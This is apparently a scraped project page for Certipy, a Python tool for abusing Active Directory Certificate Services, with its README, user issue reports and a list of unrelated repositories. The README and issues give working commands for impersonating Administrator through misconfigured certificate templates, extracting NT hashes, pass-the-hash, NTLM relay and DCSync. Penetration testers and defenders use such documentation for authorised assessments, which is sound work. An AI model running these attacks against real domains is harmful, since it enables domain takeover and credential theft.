Python implementation for Active Directory certificate abuse

Related tags

MiscellaneousCertipy
Overview

Certipy

Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Based on the C# variant Certify from @harmj0y and @tifkin_.

Table Of Contents

Installation

$ python3 setup.py install

Remember to add the Python scripts directory to your path.

Usage

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  Action
    find                Find certificate templates
    req                 Request a new certificate
    auth                Authenticate with a certificate
    auto                Automatically abuse certificate templates for privilege escalation

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it
  -nameserver nameserver
                        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Examples

Auto

Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the Administrator user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.

To demonstrate how easy it is to misconfigure certificate templates, the default certificate template Web Server has been copied to Copy of Web Server. The only change was that the EKU Server Authentication was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the Client Authentication EKU.

In this example, the user john is a low privileged user who is allowed to enroll for the Copy of Web Server template.

$ certipy 'predator/john:[email protected]' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': fc525c9683e8fe067095ba2ddc971889

By default, the user Administrator is chosen. Use the -user parameter to create a certificate for another user.

Find

The find action will find certificate templates that are enabled by one or more CAs.

Find vulnerable templates

Use the -vulnerable parameter to only find vulnerable certificate templates.

$ certipy 'predator/john:[email protected]' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU

Use the -user parameter to find vulnerable certificate templates for another user. By default, the current user will be used.

Find all templates

$ certipy 'predator/john:[email protected]' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator

Request

Request a new certificate from a certificate template. By default, the current user specified in the target parameter will be used.

Request as another user

To request a certificate as another user, use the -alt parameter. This only applies to certificate templates, where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e. User Specified SAN is set to Enabled.

In this example, the user john is a low privileged user. The certificate template Copy of Web Server is a copy of the default Web Server template. The EKU Server Authentication was removed, such that the template has no EKUs (No EKUs = any purpose). The default Web Server template allows the enrollee to supply the subject.

john will request a certificate valid for authentication as jane. The CA predator-DC-CA has Copy of Web Server enabled.

$ certipy 'predator/john:[email protected]' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'

The certificate and key will be DER encoded and saved to .(crt|key) , where request ID is returned by the server.

Request as self

It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default User template.

$ certipy 'predator/john:[email protected]' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN '[email protected]'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'

Authenticate

The auth action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user must be specified in the target parameter. If not specified, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache to .ccache .

The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.

$ certipy 'predator/[email protected]' auth -cert ./2.crt -key ./2.key
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': 077cccc23f8ab7031726a3b70c694a49

Using the NT hash

You can simply pass-the-hash (PTH) for many services. For instance SMB:

$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: administrator, active:     1, idle:     0

Using the credential cache

The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the cifs (SMB) service at dc.predator.local:

$ # use TGT from Certipy
$ export KRB5CCNAME=./Administrator.ccache
$ # request TGS
$ impacket-getST -spn 'cifs/dc.predator.local' -dc-ip 172.16.19.100 -no-pass -k 'predator/administrator'
$ # use TGS from impacket-getST
$ export KRB5CCNAME=./administrator.ccache
$ # run smbclient with TGS (notice the FQDN)
$ impacket-smbclient -k -no-pass 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: Administrator, active:     1, idle:     0

Note that impacket-getST will overwrite the credential cache at .ccache . Create a copy of the credential cache from Certipy before requesting a TGS with impacket-getST.

Errors

Please submit any errors, issues, or questions under "Issues". A lot of errors can be caused by the user, tool, and target, but the error handling is not perfect.

Credits

Comments
  • Help understanding limitations of

    Help understanding limitations of "KDC_ERR_PADATA_TYPE_NOSUPP"

    Hello!

    Certipy has identified a number of templates in this environment vulnerable to ESC1. I've done:

    certipy req 'victim.domain/[email protected]' -ca 'CA-NAME' -template 'VULNERABLETEMPLATE' -k -no-pass -alt '[email protected]'

    I got a domainadmin.pfx and I'm ready to test it out.

    When I do certipy auth -pfx domainadmin.pfx -dc-ip ip.of.domain.controller I get:

    [*] Trying to get TGT...
    [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
    

    Upon checking this repo's issues, I came across this one leading me to believe I can use this blog/tool to abuse this path via Linux, but from your blog it's my understanding that if the CA is fully patched, this is a dead end.

    To further confuse me, this blog makes me think abuse still is possible, but this content looks to be specifically about abuse when you've obtained the cert for a domain controller (which I have not).

    Would you point me in the right direction - just so I'm not chasing a dead end?

    opened by 7MinSec 14
  • error: SandboxViolation

    error: SandboxViolation

    error: Setup script exited with error: SandboxViolation: mkdir('/private/var/root/Library/Caches/com.apple.python/private/tmp/easy_install-qii5l5tu', 511) {}

    opened by void-ll 11
  • Got error: 'NoneType' object has no attribute 'request'

    Got error: 'NoneType' object has no attribute 'request'

    I am attempting to perform a certificate request using the current version of certipy.

    I've ran the setup and did not see any issues/errors.

    When attempting the req I am getting a error concerning the request attribute.

    Below is the output from the command as well as the output from the command with the suggested -debug option.

    ============================

    [email protected]:/usr/share/Certipy# certipy req 'domain/usertest:[email protected]' -ca ca3 -template User Certipy v3.0.0 - by Oliver Lyak (ly4k)

    [*] Requesting certificate [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' [-] Use -debug to print a stacktrace

    ===========================

    [email protected]:/usr/share/Certipy# certipy req 'domain/usertest:[email protected]' -ca ca3 -template User -debug Certipy v3.0.0 - by Oliver Lyak (ly4k)

    [+] Trying to resolve 'dc3' at '192.168.202.2' [+] Generating RSA key [*] Requesting certificate [+] Trying to connect to endpoint: ncacn_np:192.168.0.31[\pipe\cert] [!] Failed to connect to endpoint ncacn_np:192.168.0.31[\pipe\cert]: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.) [+] Trying to resolve dynamic endpoint 'redacted' [+] Failed to resolve dynamic endpoint 'redacted' [-] Failed to get dynamic TCP endpoint for CertSvc [-] Got error: 'NoneType' object has no attribute 'request' Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/entry.py", line 85, in main actionsoptions.action File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 334, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-3.0.0-py3.9.egg/certipy/request.py", line 256, in request response = self.dce.request(request) AttributeError: 'NoneType' object has no attribute 'request'

    opened by forensic65x 9
  • ESC7 - Error when attempting to add an officer

    ESC7 - Error when attempting to add an officer

    When attemting to exploit ESC7 and the account I use for authentication does not have the right Manage Certificates, I must add that account as a new officer in order to grant the account that right. This fails for me using Certipy 2.0.6. esc7_dc1

    Once this works, can I delete/remove the officer and possibly other remaining changes after the attack?

    opened by jsdhasfedssad 8
  • certipy: error: unrecognized arguments

    certipy: error: unrecognized arguments

    Hello,

    I have cloned the repo using the command

    git clone https://github.com/ly4k/Certipy.git
    

    I then cd'd into the Certipy directory and ran the command

    sudo python3 /path/to/Certipy/setup.py install
    

    I am trying to execute the basic certipy find command and I am getting an error regarding unrecognized commands

    The command that I am executing is:

    certipy find "fqdn/user_samaccountname:[email protected]_controller_fqdn_or_IPAddress"
    

    After running the command I am getting the error message

    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    usage: certipy [-v] [-h] {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template} ...
    certipy: error: unrecognized arguments: fqdn/user_samaccountname:[email protected]_controller_fqdn_or_IPAddress
    

    I have been to the blog post and read through it but no luck- https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6

    All documentation that I am seeing is on version 2. Could this be a version 4 issue?

    Thanks!

    opened by robertstrom 7
  • Formatting question for

    Formatting question for "ESC1 - SAN Impersonation" attack

    Hello!

    I've got an environment where I've run the Certipy enumeration and have a template vulnerable to ESC1. I've requested a TGT for my "standard" user using GetTGT from impacket. And then I've launched Certipy as follows:

    certipy 'NETBIOS-NAME-OF-DOMAIN/[email protected]' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req template 'VULNERABLETEMPLATE' -ca 'CA-NAME' -alt 'DOMAIN-ADMIN'
    

    When this runs, I get:

    [+] Trying to resolve 'VULN-CA-SERVER' at 'IP-OF-DC'
    [+] Connecting to SMB at 'VULN-CA-SERVER' 
    [+] Using Kerberos Cache: regularuser.ccache
    [+] SPN CIFS/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] SPN KRBTGT/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] No valid credentials found in cache.
    

    This is followed by a traceback and tons of python errors. Do I have a syntax error? I'm not sure what the expected output should look like.

    Thanks, Brian

    opened by 7MinSec 7
  • Help understanding

    Help understanding "relay" issues?

    Hello!

    I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.

    I setup Certipy in one window as follows:

    certipy relay -ca ca.domain.com

    In another window I did Coercer with:

    coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS

    In the Certipy window I get:

    Targeting http://ca.domain.com/certsrv/certfnsh.asp
    Listening on 0.0.0.0:445
    Requesting certificate for 'DOMAIN\\DC$' based on the template "Machine'
    Request ID is 123
    Would you like to save the private key? (y/N)
    

    It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.

    Any help pointing me in the right direction to troubleshoot would be much appreciated!

    Thanks, Brian

    opened by 7MinSec 6
  • E_INVALIDARG - One or more arguments are invalid

    E_INVALIDARG - One or more arguments are invalid

    An error occurred while requesting a certificate using a domain user I am using version 4.0 This is the command I used:certipy req -username [email protected] -p Passowrd! -ca test-DC01-CA -template User -target 173.100.4.60 -debug The following is the error report: [+] Trying to connect to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [proxychains] Strict chain ... 192.168.172.130:1080 ... 173.100.4.60:445 ... OK [+] Connected to endpoint: ncacn_np:173.100.4.60[\pipe\cert] [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/entry.py", line 60, in main actions[options.action](options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/parsers/req.py", line 12, in entry req.entry(options) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 764, in entry request.request() File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 715, in request cert = self.interface.request(csr, attributes) File "/usr/local/lib/python3.9/dist-packages/Certipy-4.0.0-py3.9.egg/certipy/commands/req.py", line 208, in request response = self.dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20220502.112312.90866d4c-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request raise exception

    opened by helloyw 6
  • Problems with passwords that contain '#' ?

    Problems with passwords that contain '#' ?

    Hello,

    I'm using certipy on a pentest where my AD account password has '#' in it. When I run a 'certipy find' I get the below error in the output. I am running the latest/greatest certipy on 2 different pentests right now, and on the pentest where my password is just upper/lower/numbers (and a special character that is not a '#'), certipy runs fine.

    [*] Finding certificate templates
    [+] Authenticating to LDAP server
    [-] Got error: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
    Traceback (most recent call last):
      File "/usr/lib/python3.10/hashlib.py", line 160, in __hash_new
        return _hashlib.new(name, data, **kwargs)
    ValueError: [digital envelope routines] unsupported
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
        password_digest = hashlib.new('MD4', self._password.encode('utf-16-le')).digest()
      File "/usr/lib/python3.10/hashlib.py", line 166, in __hash_new
        return __get_builtin_constructor(name)(data)
      File "/usr/lib/python3.10/hashlib.py", line 123, in __get_builtin_constructor
        raise ValueError('unsupported hash type ' + name)
    ValueError: unsupported hash type MD4
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/entry.py", line 85, in main
        actions[options.action](options)
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 736, in entry
        find.find()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 116, in find
        certificate_templates = self.get_certificate_templates()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 691, in get_certificate_templates
        certificate_templates = self.connection.search(
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/find.py", line 109, in connection
        self._connection.connect()
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 53, in connect
        self.connect(version=ssl.PROTOCOL_TLSv1_2)
      File "/usr/local/lib/python3.10/dist-packages/Certipy-3.0.0-py3.10.egg/certipy/ldap.py", line 100, in connect
        bind_result = ldap_conn.bind()
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 621, in bind
        response = self.do_ntlm_bind(controls)
      File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 1388, in do_ntlm_bind
        request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client,
      File "/usr/lib/python3/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
        server_creds = name.create_authenticate_message()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
        nt_challenge_response = self.compute_nt_response()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
        response_key_nt = self.ntowf_v2()
      File "/usr/lib/python3/dist-packages/ldap3/utils/ntlm.py", line 501, in ntowf_v2
        password_digest = MD4.new(self._password.encode('utf-16-le')).digest()
    SystemError: PY_SSIZE_T_CLEAN macro must be defined for '#' formats
    
    opened by 7MinSec 6
  • "Auth" module throws ImportError

    Hi there, I got introduced to Certipy via the TryHackMe room CVE-2022-26923. I installed the latest version of Certipy via PyPI.

    The request module successfully saves a certificate to local storage.

    image

    When I tried to use the certificate for authentication, I got an ImportError.

    image

    The same command using Certipy version 2.0.9 with the same certificate does work.

    image

    I am using a dockerized Kali with Python 3.10 on an aarch64 machine.

    opened by tdekeyser 5
  • RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid

    RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid

    [*] Requesting certificate [-] Got error: RequestSessionError: code: 0x80070057 - E_INVALIDARG - One or more arguments are invalid. [-] Use -debug to print a stacktrace image

    Has the boss ever reported this error

    opened by howtogetfish 5
  • Support for relaying NTLM to ICPR (ESC11)

    Support for relaying NTLM to ICPR (ESC11)

    Hi,

    Again, thank you for this tool!

    I recently stumbled upon this article about relaying NTLM to ICPR by Compass Security using a CA which has "IF_ENFORCEENCRYPTICERTREQUEST" disabled. They have dubbed it ESC11. They use a fork of Certipy for identification of vulnerable CAs and a fork of Impacket to abuse them. I can see that there is a PR (105) for the identification part but there isn't one for the abuse part. Would you consider supporting ESC11? Both the identification and abuse parts.

    Thanks!

    opened by jsdhasfedssad 1
  • [Enhancement] Adding Dockerfile

    [Enhancement] Adding Dockerfile

    Hi!

    If there's any interest in a dockerized version, I've created a Dockerfile and edited the README with instructions. I hit some dependency snags when working with Certipy and sought to solve them with Docker. The dockerfile is derived from the dockerfiles of Impacket and CrackMapExec.

    The mounted volume is good for collecting all of the artifacts. You should also still be able to publish a port for certipy relay but I have not tested that yet.

    This set up may need some testing to make sure it works in all use cases but so far so good for me! (Tested w. ESC1, 2, 3, Golden Certificate)

    opened by HuskyHacks 0
  • Python 3.11 compatibility because of enum module

    Python 3.11 compatibility because of enum module

    At the moment, Certipy is not compatible with Python 3.11.

    This is because it uses the undocumented _decompose function of the enum module, which apparently got removed in Python 3.11. When running under this version of Python, the following error is shown:

    AttributeError: module 'enum' has no attribute '_decompose'
    

    The problematic function calls are in certipy/lib/structs.py and certipy/lib/constants.py.

    opened by exploide 1
  • Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.

    Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.

    Hello,

    I am building an environment to test ESC2 and ESC3. I have an AD CS template with EKU "Any purpose" setup as well as the default "User" template published.

    First off i'll fetch the "Any purpose" EKU (ESC2/3) template:

    /usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x
    

    Then i'll use that pfx to sign a new CSR and apply for a client authentication certificate via the default template User on behalt of the Administrator.

    /usr/local/bin/certipy req  -u [email protected] -p ******** -ca test-corp-CA01-CA -template User -on-behalf-of 'DOMAIN\Administrator' -target-ip x.x.x.x -dc-ip x.x.x.x. -pfx test.pfx
    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    [*] Requesting certificate via RPC
    [-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
    [*] Request ID is 114
    Would you like to save the private key? (y/N)
    

    I get the same error when i try to renew the initial test.pfx certificate.

    /usr/local/bin/certipy req -renew  -u [email protected] -p ******** -ca test-corp-CA01-CA -template esc2 -target-ip x.x.x.x -dc-ip x.x.x.x -pfx test.pfx
    Certipy v4.0.0 - by Oliver Lyak (ly4k)
    
    [*] Requesting certificate via RPC
    [-] Got error while trying to request certificate: code: 0x8009310b - CRYPT_E_ASN1_BADTAG - ASN1 bad tag value met.
    [*] Request ID is 115
    Would you like to save the private key? (y/N)
    

    The ESC2/3 privesc works fine from certify.exe from a domain joined windows box.

    I have tried to figure out which ASN.1 tag in https://github.com/ly4k/Certipy/blob/main/certipy/lib/certificate.py#L525 that might be wrong however i'm not successful.

    I'm on the latest 92592c59acf50e5db3ace2947680614c110aff82 commit.

    opened by viksafe 1
  • Some try/except to make it work in a test env

    Some try/except to make it work in a test env

    This makes it work in my test env. If you cant add a machine for example. The others I did not investigate fully, but the try/catch makes certipy at least not fully crash

    opened by realalexandergeorgiev 0
  • "Auth" command after NTLM relay to an HTTP endpoint returns error when getting TGT: KRB_AP_ERR_MODIFIED

    When performing a basic NTLM relay attack (with PetitPotam to coerce auth) using the "relay" command, everything goes fine as you see below:

    image

    The PFX is saved and no error is thrown. However, when you follow this up with a certipy auth as below, a Kerberos error is thrown upon requesting the TGT:

    image

    However, requesting the TGT and NTLM hash with Rubeus works just as expected:

    image

    And then I was able to DC Sync with CME using the NTLM hash and/or TGT:

    image

    The DC involved is a Windows Server 2022 and the CA, on a separate server specifically to facilitate the NTLM relay simulation, is Windows Server 2019. I suspect this may be an issue related to the super up-to-date version of Windows Server that the DC is running on; perhaps Certipy just hasn't been updated to cope with it yet but Rubeus has (it receives more regular updates). Any idea is appreciated, though!

    opened by Alh4zr3d 1
Releases(4.3.0)
Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
Easily Generate Revolut Business Cards

RevBusinessCardGen Easily Generate Revolut Business Cards Prerequisites Before you begin, ensure you have met the following requirements: You have ins

Younes™ 35 Dec 14, 2022
Hera is a Python framework for constructing and submitting Argo Workflows.

Hera is an Argo Workflows Python SDK. Hera aims to make workflow construction and submission easy and accessible to everyone! Hera abstracts away workflow setup details while still maintaining a cons

argoproj-labs 241 Jan 02, 2023
A corona information module

A corona information module

Fayas Noushad 3 Nov 28, 2021
It is a Blender Tool which can convert the Object Data Attributes in face corner to the UVs or Vertex Color.

Blender_ObjectDataAttributesConvertTool It is a Blender Tool which can convert the Object Data Attributes in face corner to the UVs or Vertex Color. D

Takeshi Chō 2 Jan 08, 2022
Python package for reference counting native pointers

refcount master: testing: This package is primarily for managing resources in native libraries, written for instance in C++, from Python. While it boi

CSIRO Hydroinformatics 2 Nov 03, 2022
Youtube Channel Website

Videos-By-Sanjeevi Youtube Channel Website YouTube Channel Website Features: Free Hosting using GitHub Pages and open-source code base in GitHub. It c

Sanjeevi Subramani 5 Mar 26, 2022
Fuzz introspector for python

Fuzz introspector High-level goals: Show fuzzing-relevant data about each function in a given project Show reachability of fuzzer(s) Integrate seamles

14 Mar 25, 2022
peace-performance (Rust) binding for python. To calculate star ratings and performance points for all osu! gamemodes

peace-performance-python Fast, To calculate star ratings and performance points for all osu! gamemodes peace-performance (Rust) binding for python bas

9 Sep 19, 2022
Gmvault: Backup and restore your gmail account

Gmvault: Backup and restore your gmail account Gmvault is a tool for backing up your gmail account and never lose email correspondence. Gmvault is ope

Guillaume Aubert 3.5k Jan 01, 2023
Practice in Oxford_AI&ML class

Practice in Oxford_AI&ML class

St3ve Lee 2 Feb 04, 2022
Xbps-install wrapper written in Python that doesn't care about case sensitiveness and package versions

xbi Xbps-install wrapper written in Python that doesn't care about case sensitiveness and package versions. Description This Python script can be easi

Emanuele Sabato 5 Apr 11, 2022
Cross-platform MachO/ObjC Static binary analysis tool & library. class-dump + otool + lipo + more

ktool Static Mach-O binary metadata analysis tool / information dumper pip3 install k2l Development is currently taking place on the @python3.10 branc

Kritanta 301 Dec 28, 2022
Cloud Native sample microservices showcasing Full Stack Observability using AppDynamics and ThousandEyes

Cloud Native Sample Bookinfo App Observability Bookinfo is a sample application composed of four Microservices written in different languages.

Cisco DevNet 13 Jul 21, 2022
An Airdrop alternative for cross-platform users only for desktop with Python

PyDrop An Airdrop alternative for cross-platform users only for desktop with Python, -version 1.0 with less effort, just as a practice. ##############

Bernardo Olisan 6 Mar 25, 2022
A simple wrapper for joy library

Joy CodeGround A simple wrapper for joy library to render joy sketches in browser using vs code, (or in other words, for those who are allergic to Jup

rijfas 9 Sep 08, 2022
Airplane reservation system python 2

airplane-reservation-system-python-2 Announcement 🔊 : 🔴 IMPORTANT 🔴 : Few new things have been added into the code [16/05/2021] different names is

voyager2005 1 Dec 06, 2021
Serverless demo showing users how they can capture (and obfuscate) their Lambda payloads in Datadog APM

Serverless-capture-lambda-payload-demo Serverless demo showing users how they can capture (and obfuscate) their Lambda payloads in Datadog APM This wi

Datadog, Inc. 1 Nov 02, 2021
CALPHAD tools for designing thermodynamic models, calculating phase diagrams and investigating phase equilibria.

CALPHAD tools for designing thermodynamic models, calculating phase diagrams and investigating phase equilibria.

pycalphad 189 Dec 13, 2022
Bible-App : Simple Tool To Show Bible Books

Bible App Simple Tool To Show Bible Books Socials: Language:

ميخائيل 5 Jan 18, 2022
Create standalone, installable R Shiny apps using Electron

WARNING This is still very much a work in progress and nothing can be assumed stable in any way Temp notes: Two types of created installer, based on w

Chase Clark 5 Dec 24, 2021